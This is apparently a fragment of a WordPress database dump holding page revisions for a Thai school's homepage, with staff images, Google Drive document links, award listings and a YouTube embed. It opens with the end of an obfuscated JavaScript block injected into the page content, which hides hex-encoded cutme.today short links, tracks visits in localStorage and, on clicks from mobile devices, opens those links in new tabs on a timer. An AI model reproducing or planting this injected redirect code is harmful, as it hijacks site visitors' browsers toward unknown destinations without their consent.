_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 15:38:37','2025-06-27 08:38:37','',19,'http://watprato.ssk.in.th/?p=582',0,'revision','',0),
(583,1,'2025-06-27 15:38:49','2025-06-27 08:38:49','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_8cd9a2-b3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_8cd9a2-b3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"> รางวัล\"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 170px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_ed3ec7-1c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_ed3ec7-1c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รางวัล\"ด้านผลงานวิชาการที่เป็นเลิศ\"<img class=\"wp-image-538\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508661855_122233182278202781_1372776762413040353_n.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 